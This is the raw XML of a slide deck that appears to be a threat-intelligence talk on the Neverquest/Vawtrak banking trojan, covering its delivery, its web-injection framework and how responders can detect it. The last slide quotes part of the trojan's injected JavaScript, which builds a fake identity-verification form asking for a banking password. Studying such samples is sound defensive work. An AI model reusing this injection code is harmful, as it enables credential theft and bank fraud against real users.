      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="222819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addition to grabbing stored passwords, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>NeverQuest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> can harvest certificates, cookies; steal credentials for FTP programs and email; find files, download and delete files.</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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2873957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versions of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> will block SMS messages from banking institutions.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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3937973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was based on a forensic approach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to identifying the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> banking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. A lot of work has been done on reverse engineering the various versions of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and many are listed here.</a:t>
            </a:r>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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="169307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command and control infrastructure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> makes it easy for the attacker to tailor their botnet to a specific target.</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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="417954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Malware can arrive through a spam campaign,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> e.g. a fake invoice, resume, application, etc. Invoices from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Amazon.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and American Airlines have been observed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> A previously uninfected website that now contains a redirect to a site hosting an exploit kit.</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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256461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Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> uses the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>EQFramework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to inject itself into user initiated sessions to banking, finance and insurance sites. This makes it critical for incident responders to grab memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>By waiting for the victim to initiate a logon session, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Vawtrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is able to bypass security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> restrictions such as two-factor authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>If the banking institution is alerted to suspicious activity, code within the injector can block warning notices to the victim, as well as log the victim out of email so they don’t receive email alerts in a timely manner.</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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2478452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Vawtrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> contains a different set of hooks for a variety of browser products.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Logs out the victim’s email so the victim does not see any warning email notices.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Grabs a screenshot of the form data to send back to the malware authors.</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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="393332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EQFramework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Injector identifies the target URL and then identifies where to start the injection of the malicious script. A snippet of the malicious script above shows a request for the victim to verify their identity by requesting their Telephone Banking Password, ATM pin, Social Insurance Number (Canada), Mother’s Maiden Name, Drivers License, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This extraneous information is then sent back to another domain and is not seen by the banking institution.</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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30864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authors of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> continuously update their target lists to include hundreds of banking and financial institutions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> as well as retail and social sites. These lists are then made available to their clients who determine which institutions they will target during their campaign. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The list above is only a small sample of targets available.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The configuration file may also contain key words such as “account summary”, “available balance”, etc. The authors can use this technique to identify new banking targets. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> will run on the system listening for certain keywords. When one of its keywords are identified it will start recording the transaction and then send this data back to the command and control where new pages can be developed for the EQ Framework Injector that are tailored for that specific site. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>You can search for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (and other banking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>trojans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>) using this same technique.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9EEDABC0-2FCF-4406-9507-F4D10155A61B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1128928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spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>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baseline="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p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="74670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p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="266778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p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2113041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670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9849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54690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666" y="1014201"/>
            <a:ext cx="8478213" cy="2257319"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4800" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Presentation Title</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340665" y="3535680"/>
            <a:ext cx="8478213" cy="1286633"/>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7618484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67886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366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67CF3C75-F57D-0043-9FD5-42FE8965D2FA}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/13/2016</a:t>
            </a:fld>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67CF3C75-F57D-0043-9FD5-42FE8965D2FA}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/13/2016</a:t>
            </a:fld>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F3C75-F57D-0043-9FD5-42FE8965D2FA}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/13/2016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446725-7392-4A41-B984-1B22F9701FD1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="180209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spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>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baseline="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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="185842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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26998373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fld id="{67CF3C75-F57D-0043-9FD5-42FE8965D2FA}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/13/2016</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148539" y="383381"/>
            <a:ext cx="1760445" cy="306744"/>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2" r:id="rId7"/>
  </p:sldLayoutIdLst>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fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>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fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{8E41F33A-8A61-4937-A58C-46521EFFC1C2}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>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p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"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18301384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97091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739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946950"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Delivery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340665" y="1558454"/>
            <a:ext cx="8478213" cy="3842748"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Loader Malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pony</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Chanitor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Zemot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploit Kits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Angler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fiesta</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Neutrino</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spam</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1"/>
            <a:ext cx="8478213" cy="609375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EQ Framework Injector</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65" y="1633090"/>
            <a:ext cx="7199617" cy="3366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810363"/>
            <a:ext cx="8478213" cy="898725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EQ Framework Injector</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340665" y="1511052"/>
            <a:ext cx="8478213" cy="3311262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Waits for browser process to run.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> injects a tailored URL to the targeted bank.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Makes a request for the Transaction Authentication Number (TAN) for the bank of institution.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injects extra fields in the form data to gather personal security information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Changes POST address data to a non-existent sub domain so the responses do not reach the bank’s server.</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798037"/>
            <a:ext cx="8478213" cy="754050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EQ Framework Injector</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1999622" y="1566685"/>
            <a:ext cx="5777802" cy="4339650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>gbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>('main </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>nav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>').</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>style.display</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> = "none";  					</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>gbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>('layout').</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>style.display</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> = "none";  					</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> div = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>("div");  					div.id = "fake";  					</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>div.style.marginLeft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> = "20px";  					</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>div.innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> = '&lt;p class="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>pageTitle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Questio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> ns of personal identification&lt;/p&gt;\  &lt;p class="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>bodyText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>"&gt;Please verify your identity by answering your personal security questions.&lt;/p&gt;\  &lt;table&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>&gt;&lt;td class="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>bodyText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>"&gt;Telephone Banking Password&lt;/td&gt;&lt;td&gt;&lt;input id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>tbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>" type="text"  autocomplete="off" value="" </a:t>
            </a:r>
